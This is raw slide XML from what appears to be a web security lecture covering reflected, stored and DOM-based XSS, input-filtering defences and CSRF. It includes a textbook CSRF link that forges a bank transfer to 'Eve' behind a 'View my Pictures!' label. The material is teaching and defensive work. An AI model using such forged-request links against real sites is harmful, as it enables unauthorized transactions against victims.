          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="877167" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280094" algn="l"/>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pP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Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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spc="77" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="195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constructed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="195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URL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or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="195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results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27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>page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(previous</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="39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example!).</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="512354">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
            </a:pP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Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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spc="77" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Using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POST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store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bad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URL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inside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 comment/forum.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One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possible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use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get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access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cookies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belonging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clients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Web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page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(Cross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Site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Request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Forgery).</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="467399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82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Since</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="195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cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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often</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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contain</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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information,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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could </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>allow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attacker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impersonate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victim.</a:t>
            </a:r>
            <a:endParaRPr sz="1951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E4965-752F-F159-4597-5FA084A3F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977" y="451821"/>
            <a:ext cx="7250561" cy="5457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7F94-9419-0F5E-F6B3-8ADE2B60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90876-5C65-81F0-A614-9C1BACCA4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DE297-F598-2859-7368-773CA64C0555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120990" y="1622622"/>
            <a:ext cx="5601661" cy="59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Reflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="163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58467-1532-FD37-02C2-1DB1783F7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29" y="1925708"/>
            <a:ext cx="5100989" cy="579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68305-0035-00A3-EE98-DB871CB4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27" y="2617367"/>
            <a:ext cx="7936793" cy="933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285281-8C4C-7394-D5D8-07659F7CA895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120990" y="3665975"/>
            <a:ext cx="5601661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Stored / Persisted XSS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352649-1DDA-00C6-F50E-1B10DAA9F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061" y="4076328"/>
            <a:ext cx="4400684" cy="613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CFB10C-E64A-ED57-499B-3920240F9E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267084" y="4430144"/>
            <a:ext cx="8047450" cy="59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Submission via e.g. blog post, input form, chat etc. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> content is persisted and loaded for every user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1634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4E57E2-C9D4-C40D-352F-C676EED1754A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120990" y="5110515"/>
            <a:ext cx="5601661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DOM-based XSS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7645DE-92BB-58A1-B541-A2EA01246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300" y="5457934"/>
            <a:ext cx="5187447" cy="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E4C0-700C-6D69-D2C0-FA4193B8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Exkurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Juice 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52C7B-9904-8869-1CE8-BC72B185C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>
              <a:defRPr sz="726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35156">
              <a:spcBef>
                <a:spcPts val="23"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-US" spc="-23"/>
              <a:pPr marL="35156">
                <a:spcBef>
                  <a:spcPts val="23"/>
                </a:spcBef>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" spc="-2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2DE24-D605-CBC1-F69B-6D635C58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51" y="2458507"/>
            <a:ext cx="6922499" cy="23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D172-3797-F4F9-38BA-FEDEEF5D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DOM-based XSS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7C308-2D62-242B-BDD5-5AB76E155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>
              <a:defRPr sz="726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35156">
              <a:spcBef>
                <a:spcPts val="23"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-US" spc="-23"/>
              <a:pPr marL="35156">
                <a:spcBef>
                  <a:spcPts val="23"/>
                </a:spcBef>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="trim.17A09DE6-5555-441B-878A-F60EC3A209CE.MOV">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14A539D8-9AFA-815F-810C-A186AD538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3510" y="1346443"/>
            <a:ext cx="7543800" cy="47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3" y="553251"/>
            <a:ext cx="5186723" cy="5186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8121" y="553250"/>
            <a:ext cx="2455049" cy="3918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79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0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3721" spc="95" dirty="0"/>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3721" spc="236" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3721" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3721" spc="236" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3721" spc="86" dirty="0"/>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3721" spc="236" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3721" spc="82" dirty="0"/>
              <a:t>(XSS):</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3721" spc="241" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3721" spc="36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevention!!</a:t>
            </a:r>
            <a:endParaRPr sz="3721"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2228529" y="1397916"/>
            <a:ext cx="7910328" cy="5312445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80094" marR="182695" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="86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Filter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all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input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parameters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from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HTTP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GET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POST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(Even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if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you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use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client-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side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validation)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17" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>…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Characters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with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special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meaning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HTML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JavaScript,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e.g.,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&lt;,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&gt;,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(,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),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86" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>#,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&amp;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should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removed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or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substituted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(e.g.,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213" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;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becomes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&amp;lt;)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17" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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This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may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also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require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filtering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all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types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of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active</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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content</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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(JavaScript,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ActiveX,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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etc.).</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="812620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But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it’s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easy</a:t>
            </a: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forget</a:t>
            </a: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something,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so</a:t>
            </a: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it’s</a:t>
            </a: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better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specify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18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>what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characters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are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allowed,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e.g.,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[A-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Za-</a:t>
            </a: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z0-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>9].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i.e.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positive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filtering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approach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works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best!</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="657012" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280094" algn="l"/>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pP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Positive</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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filtering:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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Specify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what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allowed,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anything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that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does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not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match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2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rejected.</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" indent="-269144">
              <a:spcBef>
                <a:spcPts val="604"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280094" algn="l"/>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" b="1" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Negative</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="1" spc="20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filtering:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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Specify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what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not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allowed,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everything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else</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="195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goes.</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="957854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Make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sure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that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client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server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agree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on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character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set </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(Unicode,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UTF-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8).</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="5114317">
              <a:spcBef>
                <a:spcPts val="535"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2087" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Reference,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>See:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087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u="sng" spc="154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OWASP</a:t>
            </a:r>
            <a:endParaRPr sz="2087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4" y="576303"/>
            <a:ext cx="5901338" cy="4495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5106" y="576303"/>
            <a:ext cx="1751960" cy="4495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97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3"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3131" spc="95" dirty="0"/>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="309" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="309" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" dirty="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="309" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" dirty="0"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="309" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="113" dirty="0"/>
              <a:t>(CSRF):</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="309" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summary!</a:t>
            </a:r>
            <a:endParaRPr sz="3131"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2223522" y="5406294"/>
            <a:ext cx="6288036" cy="1411365"/>
            <a:chOff x="2070403" y="5682523"/>
            <a:chExt cx="6928484" cy="1555115"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2287664" y="5943600"/>
              <a:ext cx="6495415" cy="1054100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6495415" h="1054100">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6495153" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6495153" y="1054100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1054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A6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0403" y="5682523"/>
              <a:ext cx="6928408" cy="1554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61212" y="1281511"/>
            <a:ext cx="7676350" cy="5062889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80094" marR="34003" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="86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Send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victim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with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specially-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crafted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URL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that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contains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malicious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request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for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target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site.</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="191340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Takes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advantage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fact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that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victim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may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i="1" spc="-73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>authenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-5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to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target</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="8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site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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perform</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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privileged</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="8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operations.</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="4611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attacker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gains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access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cookies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web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application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36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cannot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distinguish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between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legitimate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request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an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attacker's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request.</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="72041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If</a:t>
            </a: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victim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an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admin,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then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entire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site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86" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>could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compromised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as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attacker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91" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can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gain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access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victim's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credentials.</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0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endParaRPr sz="2451" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1137091" marR="349830" indent="-1126141">
              <a:lnSpc>
                <a:spcPct val="123200"/>
              </a:lnSpc>
            </a:pP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Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="1" spc="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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>“Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-45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50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-41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9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>logged</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-41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59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-41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23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>his</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-41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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>bank</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-41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23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>account.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-41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endParaRPr lang="en-US" sz="1951" i="1" spc="-41" dirty="0">
              <a:solidFill>
                <a:srgbClr val="363929"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1137091" marR="349830" indent="-1126141">
              <a:lnSpc>
                <a:spcPct val="123200"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Eve</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-41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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>sends</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-41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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-41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77" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-77" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>email</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-50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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-50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50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-45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32" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>containing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-45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103" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-45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9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>line”…</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="14"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2904" dirty="0">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1352637" marR="978602">
              <a:lnSpc>
                <a:spcPts val="1824"/>
              </a:lnSpc>
            </a:pP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dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://bank.com/transfer.do?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acct=Eve&amp;amount=100000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r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>View</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-23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my</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> Pictures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!&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a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endParaRPr sz="1543" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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27796-9CE4-E2F9-030F-F050A3005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391" y="3612776"/>
            <a:ext cx="3140310" cy="2987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30FA-16B5-B2F5-990F-397BDE22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CBFB6-2266-49DF-5D2F-0B16F2393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5FC9F-C4B8-62CD-778F-A14BAD022BE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1946621" y="1377861"/>
            <a:ext cx="8437069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CSRF works if sessions are identified by Cookies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56534-8F0C-A95E-066A-433E61971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548" y="1704814"/>
            <a:ext cx="7487214" cy="1582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4F6F9-67B8-4BDB-D4E7-A9C75BD0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53" y="3589407"/>
            <a:ext cx="7487214" cy="2299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78797A-79AC-57DB-905C-2194EBDCCCB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1967325" y="3321851"/>
